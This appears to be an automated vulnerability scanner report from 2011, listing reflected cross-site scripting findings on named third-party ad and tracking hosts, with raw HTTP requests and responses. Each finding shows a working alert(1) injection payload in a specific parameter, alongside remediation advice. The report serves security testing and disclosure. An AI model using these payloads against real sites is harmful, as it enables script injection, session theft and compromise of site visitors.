The value of the dn request parameter is copied into the HTML document as plain text between tags. The payload bc5bd<img%20src%3da%20onerror%3dalert(1)>1d43d8ca98c was submitted in the dn parameter. This input was echoed as bc5bd<img src=a onerror=alert(1)>1d43d8ca98c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /serve.php?lid=583648&dn=toyhookupinc.combc5bd<img%20src%3da%20onerror%3dalert(1)>1d43d8ca98c HTTP/1.1
Host: ndparking.com
Proxy-Connection: keep-alive
Referer: http://www.toyhookupinc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.276. http://ndparking.com/serve.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ndparking.com
Path: /serve.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ab66<img%20src%3da%20onerror%3dalert(1)>fba4a16700b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4ab66<img src=a onerror=alert(1)>fba4a16700b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /serve.php?lid=583648&dn=toyhookupinc/4ab66<img%20src%3da%20onerror%3dalert(1)>fba4a16700b.com HTTP/1.1
Host: ndparking.com
Proxy-Connection: keep-alive
Referer: http://www.toyhookupinc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the targetRow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc89f"><script>alert(1)</script>2cb911969fb was submitted in the targetRow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the the_field request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93bc"><script>alert(1)</script>15144e7e833 was submitted in the the_field parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the position request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51d9"%3balert(1)//fc057915e27 was submitted in the position parameter. This input was echoed as b51d9";alert(1)//fc057915e27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d395'-alert(1)-'02d5b309f8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ns.informit3d395'-alert(1)-'02d5b309f8a/homepage;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836? HTTP/1.1
Host: origin.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:39 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:39 GMT
Content-Length: 480
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc36e'-alert(1)-'bd390394690 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ns.informit/homepagecc36e'-alert(1)-'bd390394690;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836? HTTP/1.1
Host: origin.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:40 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:40 GMT
Content-Length: 480
1.282. http://origin.collective-media.net/adj/ns.informit/homepage [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://origin.collective-media.net
Path: /adj/ns.informit/homepage
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7178'-alert(1)-'eed06b52a24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ns.informit/homepage;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836?&d7178'-alert(1)-'eed06b52a24=1 HTTP/1.1
Host: origin.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:38 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:38 GMT
Content-Length: 483
The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edd6b'-alert(1)-'bf426a113ed was submitted in the ppos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ns.informit/homepage;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836?edd6b'-alert(1)-'bf426a113ed HTTP/1.1
Host: origin.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:37 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:37 GMT
Content-Length: 480
The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bcc3a%3balert(1)//9a1d8570383 was submitted in the hl parameter. This input was echoed as bcc3a;alert(1)//9a1d8570383 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the kind request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1292f%3balert(1)//5587302e2 was submitted in the kind parameter. This input was echoed as 1292f;alert(1)//5587302e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 12213%3balert(1)//ad3d5b34e0e was submitted in the hl parameter. This input was echoed as 12213;alert(1)//ad3d5b34e0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the kind request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3441b%3balert(1)//459d8fa95bc was submitted in the kind parameter. This input was echoed as 3441b;alert(1)//459d8fa95bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29d16"-alert(1)-"f9985bb395a was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=14429d16"-alert(1)-"f9985bb395a&pubId=23374&campId=168344 HTTP/1.1
Host: pixel.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/tigerdirect.com/ROS_728x90;sz=728x90;ord=[timestamp]?
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2C67127172975912387824C2C36500C2; Path=/
Content-Type: text/javascript
Date: Tue, 27 Sep 2011 22:13:00 GMT
Connection: close
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5ef1"-alert(1)-"a3b5405208e was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=23374&campId=168344f5ef1"-alert(1)-"a3b5405208e HTTP/1.1
Host: pixel.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/tigerdirect.com/ROS_728x90;sz=728x90;ord=[timestamp]?
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9331CC42371478F2EF9CE249702D904B; Path=/
Content-Type: text/javascript
Date: Tue, 27 Sep 2011 22:13:00 GMT
Connection: close
1.290. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pixel.adsafeprotected.com
Path: /jspix
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57867"-alert(1)-"c74cfdd5c3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=23374&campId=168344&57867"-alert(1)-"c74cfdd5c3d=1 HTTP/1.1
Host: pixel.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/tigerdirect.com/ROS_728x90;sz=728x90;ord=[timestamp]?
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CE0F09E19FED188131E1C1FE386DA047; Path=/
Content-Type: text/javascript
Date: Tue, 27 Sep 2011 22:13:21 GMT
Connection: close
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 309a8"-alert(1)-"633cafc44ab was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=23374309a8"-alert(1)-"633cafc44ab&campId=168344 HTTP/1.1
Host: pixel.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/tigerdirect.com/ROS_728x90;sz=728x90;ord=[timestamp]?
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3BAB401A71B6DEBFC73DAFAC83A8175B; Path=/
Content-Type: text/javascript
Date: Tue, 27 Sep 2011 22:13:00 GMT
Connection: close
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 51a7e<x%20style%3dx%3aexpression(alert(1))>f4490ed59f1 was submitted in the name parameter. This input was echoed as 51a7e<x style=x:expression(alert(1))>f4490ed59f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /serve/fb/pdc?cat=&name=landing51a7e<x%20style%3dx%3aexpression(alert(1))>f4490ed59f1&sid=3984&xr=2764965424800301950&referer=http%3A%2F%2Fwww.gigya.com%2Fsocial-login%2F HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdj?cat=&name=landing&sid=3984
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef826'%3balert(1)//45f0f864480 was submitted in the admeld_callback parameter. This input was echoed as ef826';alert(1)//45f0f864480 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 11 Aug 2011 22:42:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 11-Aug-2011 22:42:12 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 245
The value of the publisher_redirecturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48ae"><script>alert(1)</script>e618e93dd42 was submitted in the publisher_redirecturl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 27 Sep 2011 22:12:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 27-Sep-2011 22:11:58 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 264
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd00"><script>alert(1)</script>514e088d3b5 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205e7"><script>alert(1)</script>f924f81b73c was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e956b<img%20src%3da%20onerror%3dalert(1)>6e552069ce was submitted in the REST URL parameter 1. This input was echoed as e956b<img src=a onerror=alert(1)>6e552069ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd862<img%20src%3da%20onerror%3dalert(1)>acdc49c406c was submitted in the REST URL parameter 2. This input was echoed as cd862<img src=a onerror=alert(1)>acdc49c406c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d4f7<img%20src%3da%20onerror%3dalert(1)>30f29d59763 was submitted in the REST URL parameter 3. This input was echoed as 4d4f7<img src=a onerror=alert(1)>30f29d59763 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d735d<img%20src%3da%20onerror%3dalert(1)>8340f1bf678 was submitted in the REST URL parameter 1. This input was echoed as d735d<img src=a onerror=alert(1)>8340f1bf678 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload afd35<img%20src%3da%20onerror%3dalert(1)>17454ca8835 was submitted in the REST URL parameter 2. This input was echoed as afd35<img src=a onerror=alert(1)>17454ca8835 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a7f0e<img%20src%3da%20onerror%3dalert(1)>21e74a267b was submitted in the REST URL parameter 3. This input was echoed as a7f0e<img src=a onerror=alert(1)>21e74a267b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload eacc2<script>alert(1)</script>69732fbac36 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the addressfull request parameter is copied into the HTML document as plain text between tags. The payload cc962<a>6264bc0d9da was submitted in the addressfull parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the app_handle request parameter is copied into the HTML document as plain text between tags. The payload 5c254<script>alert(1)</script>2623adaaaf0 was submitted in the app_handle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rok-get?app_handle=cncnetworkbar5c254<script>alert(1)</script>2623adaaaf0&unit_sp=64&site=11&wrapper=json HTTP/1.1
Host: rok.com.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
rubicsResponse ( { rubics: { meta: { timestamp: "2011.08.31.14.49.06.PDT", v: "$Name: not supported by cvs2svn $", adstamp: "", errorText: "Empty ROS response text: _URI=http://rok.com.com/rok-get?app_handle=cncnetworkbar5c254<script>alert(1)</script>2623adaaaf0&unit_sp=64&site=11&wrapper=json;COULD NOT MAP APP_HANDLE=\"cncnetworkbar5c254scriptalert(1)script2623adaaaf0\" TO APP_ID" }, request: { appHandle: "cncnetworkbar5c254scriptalert(1)script2623ad ...[SNIP]...
1.306. http://rok.com.com/rok-get [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://rok.com.com
Path: /rok-get
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ce085<script>alert(1)</script>a0bb84065da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rok-get?app_handle=cncnetworkbar&unit_sp=64&site=11&wrapper=json&ce085<script>alert(1)</script>a0bb84065da=1 HTTP/1.1
Host: rok.com.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the site request parameter is copied into the HTML document as plain text between tags. The payload 65ce0<script>alert(1)</script>da8a56256af was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rok-get?app_handle=cncnetworkbar&unit_sp=64&site=1165ce0<script>alert(1)</script>da8a56256af&wrapper=json HTTP/1.1
Host: rok.com.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the unit_sp request parameter is copied into the HTML document as plain text between tags. The payload a6810<script>alert(1)</script>4c046e454a2 was submitted in the unit_sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rok-get?app_handle=cncnetworkbar&unit_sp=64a6810<script>alert(1)</script>4c046e454a2&site=11&wrapper=json HTTP/1.1
Host: rok.com.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a8c1'%3balert(1)//3abc9ca82ca was submitted in the site parameter. This input was echoed as 9a8c1';alert(1)//3abc9ca82ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.asp?site=s25awsblog9a8c1'%3balert(1)//3abc9ca82ca HTTP/1.1
Host: s25.sitemeter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 01:25:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7316
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 01:35:59 GMT
Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5378'%3balert(1)//93565cda0b5 was submitted in the site parameter. This input was echoed as c5378';alert(1)//93565cda0b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.js?site=s25awsblogc5378'%3balert(1)//93565cda0b5 HTTP/1.1
Host: s25.sitemeter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 01:26:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7316
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 01:36:00 GMT
Cache-control: private
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a8c53<script>alert(1)</script>8191e201fe7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
